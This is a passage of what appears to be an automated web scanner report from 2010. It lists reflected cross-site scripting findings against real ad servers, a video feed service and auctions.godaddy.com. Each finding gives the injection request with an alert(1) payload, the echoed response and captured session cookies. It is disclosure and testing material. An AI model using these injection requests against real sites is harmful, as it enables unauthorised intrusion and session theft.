<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36731208_1289775864","http://ad.doubleclick.net//q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621;net=q1;u=,q1-36731208_1289775864,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e02'-alert(1)-'70775120aca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7159
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-66804179_1289775861","http://ad.doubleclick.net//q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1;net=q1;u=,q1-66804179_1289775861,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.9. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d68'-alert(1)-'4a0e64c7f72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_fr;sz=c3d68'-alert(1)-'4a0e64c7f72 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:03:09 GMT
Connection: close
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 21-Nov-2010 23:03:09 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 07:03:09 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 23:03:09 GMT
Content-Length: 7663

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
vascript">CollectiveMedia.createAndAttachAd("q1-49672179_1289775789","http://ad.doubleclick.net/adj/q1.mng_bang/news_fr;net=q1;u=,q1-49672179_1289775789,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg;;sz=c3d68'-alert(1)-'4a0e64c7f72;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg?","c3d68'-alert(1)-'4a0e64c7f72","",false);</scr'+'ipt>
...[SNIP]...

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e026"><script>alert(1)</script>ad814dac87d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6e026"><script>alert(1)</script>ad814dac87d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://optimized-by.rubiconproject.com/a/1032/1043/25149-30.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.turn.com
Proxy-Connection: Keep-Alive
Cookie: uid=8441693682738835253; pf=G7uw0UCPo7PvpOJrNZFANZUHCBhlwUJib-Pnfu6GGf1KuJdtSpdpFAs3agira59TNTZr_LgRBOZLGS4MdfeEwaA1lm26KJ9mIjU1VkzGfYCzwZffaQdDZ5svKRV4Ii9eFPDLEkyDnAzRkt7g6VfEWH7ozde9AptzPwZok6Bq5ehIul0qe2CMWiL60nHGh--TW56MwhDaG7nkVZW2Tzm-pqqIG-zxBY-01EY5gtFKMsKryd1gNOfF21_E24a_JcWF; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10; rds=undefined%7C14922%7C14922%7Cundefined%7Cundefined%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922; rv=1; adImpCount=nnHnhFwdbiYnNf6CCbTDdU-DTTt0zN6RsH7OhVjp-l5d6ISB_q_vS5rapRhLZ6kjj0YDFg_jdVNYatEfU4EQCxikLvxOuDf1RI2JppXsGRAd6VNsKuS6eybUUr198rg4OuBmly3hczcEX9vwybSy-KHIN_nCjXzpFw20ZJoxtW4; fc=msHy0wyTcFJ_xlwc5vT-tR-5EvE7d_eMNmVZ3PF0Z7FCXB6jox4WkVcPXM7tklXdvfBz5xDsVEqchMpjM7fNhX_OedaOZuyHwOstXJyglrrSBkeFa-ntLdCl9WSdIh8U

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8441693682738835253; Domain=.turn.com; Expires=Fri, 13-May-2011 23:03:12 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:03:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8441693682738835253&rnd=7043623080696515473&fpid=6e026"><script>alert(1)</script>ad814dac87d&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.11. http://ads.specificmedia.com/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26281'-alert(1)-'0c55ba31e43 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=7038;cxt=811200901:2036102-99061164:2034566;kw=zBlPa1sz;ts=432463;smuid=9M_kfZJzlYDj0A;p=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-026281'-alert(1)-'0c55ba31e43 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.specificmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:03:10 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=4063.149173639154485001; domain=.specificmedia.com; path=/; expires=Mon, 19-Oct-2015 23:03:10 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 587
Expires: Sat, 13 Nov 2010 23:03:10 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<scr'+'ipt language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/N5282.160253.7946241563521/B4587511.249;sz=160x600;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=7038%3Bc=115804%3Bb=688228%3Bp=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-026281'-alert(1)-'0c55ba31e43%3Bts=20101114180310%3Bdct=;ord=20101114180310?">
...[SNIP]...

3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bea1'-alert(1)-'dbc8ca0f6a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=7038;cxt=811200901:2036102-99061164:2034566;kw=zBlPa1sz;ts=432463;smuid=9M_kfZJzlYDj0A;p=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-0&5bea1'-alert(1)-'dbc8ca0f6a1=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.specificmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:03:13 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=4063.149173639154485001; domain=.specificmedia.com; path=/; expires=Mon, 19-Oct-2015 23:03:13 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 590
Expires: Sat, 13 Nov 2010 23:03:13 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<scr'+'ipt language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/N5282.160253.7946241563521/B4587511.249;sz=160x600;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=7038%3Bc=115804%3Bb=688228%3Bp=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-0&5bea1'-alert(1)-'dbc8ca0f6a1=1%3Bts=20101114180313%3Bdct=;ord=20101114180313?">
...[SNIP]...

3.13. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ap.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.2/getReleaseList

Issue detail

The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload fafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3 was submitted in the PID parameter. This input was echoed as fafd7<img src=a onerror=alert(1)>ce4f20f87e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.2/getReleaseList?PID=oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3&query=ContentCustomText|CustomerID|CAJOS&field=contentCustomData HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://img.video.ap.org/p/s/sm_hz_3thumb_scroll.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: ap.feeds.theplatform.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Mon, 15 Nov 2010 00:43:02 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

"The PID looks like it was cut-off (\"oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img src=a onerror=alert(1)>ce4f20f87e3\"). This PID is 76 character(s) long, when it should be 32 characters long."

3.14. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ap.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.2/getReleaseList

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07 was submitted in the query parameter. This input was echoed as ff556<img src=a onerror=alert(1)>4349ba1ee07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.2/getReleaseList?PID=oUFmCcyEZuCA7UqChCElKJFTJxFcgO9G&query=ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07&field=contentCustomData HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://img.video.ap.org/p/s/sm_hz_3thumb_scroll.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: ap.feeds.theplatform.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Mon, 15 Nov 2010 00:45:03 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

"\"ff556<img src=a onerror=alert(1)>4349ba1ee07\" is an unknown query title."

3.15. https://auctions.godaddy.com/ [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d78be"%3balert(1)//d2ac33e709a was submitted in the ci parameter. This input was echoed as d78be";alert(1)//d2ac33e709a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ci=13117d78be"%3balert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=vwx4pw45xf1n4zywv0gdvx45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=13117d78be%22%3balert(1)%2f%2fd2ac33e709a&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=13117d78be";alert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster
...[SNIP]...

3.16. https://auctions.godaddy.com/ [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into a JavaScript rest-of-line comment. The payload 6c4df%0aalert(1)//42f0cddfa42 was submitted in the ci parameter. This input was echoed as 6c4df
alert(1)//42f0cddfa42
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ci=131176c4df%0aalert(1)//42f0cddfa42&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=wrqsrz452daet5ecdizpbbnt; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=131176c4df%0aalert(1)%2f%2f42f0cddfa42&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
e = getObj("loginname-loginname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=131176c4df
alert(1)//42f0cddfa42
&isc=GPPT03A117&domain=sftimes.com");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               sh
...[SNIP]...

3.17. https://auctions.godaddy.com/ [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17699"style%3d"x%3aexpression(alert(1))"651a2b61a83 was submitted in the ci parameter. This input was echoed as 17699"style="x:expression(alert(1))"651a2b61a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ci=1311717699"style%3d"x%3aexpression(alert(1))"651a2b61a83&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=1lznjf45ui030teszo4b4ijt; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=1311717699%22style%3d%22x%3aexpression(alert(1))%22651a2b61a83&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<img id="imgTraf" src="https://img.godaddy.com/image.aspx?plid=1&isc=GPPT03A117&ci=1311717699"style="x:expression(alert(1))"651a2b61a83&page_name=%2ftrpHome.aspx&site=auctions.godaddy.com&referrer=&querystring=ci%3d1311717699%2522style%253d%2522x%253aexpression(alert(1))%2522651a2b61a83%26isc%3dGPPT03A117%26domain%3dsftimes.com&rnd=14
...[SNIP]...

3.18. https://auctions.godaddy.com/ [domain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ca7"%3balert(1)//7e769ef789a was submitted in the domain parameter. This input was echoed as 96ca7";alert(1)//7e769ef789a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?isc=gppt02C007&domain=sftimes.com96ca7"%3balert(1)//7e769ef789a HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=lzq1nt55ofi2tt55amvykt45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.com96ca7%22%3balert(1)%2f%2f7e769ef789a&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.com96ca7";alert(1)//7e769ef789a");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster_tbOfferAmount"))
                   { setCooki
...[SNIP]...

3.19. https://auctions.godaddy.com/ [domain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the domain request parameter is copied into a JavaScript rest-of-line comment. The payload a2165%0aalert(1)//163af430c02 was submitted in the domain parameter. This input was echoed as a2165
alert(1)//163af430c02
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)//163af430c02 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=zzdqwy55liflezmzqlrf0pnu; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)%2f%2f163af430c02&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
inname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.coma2165
alert(1)//163af430c02
");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
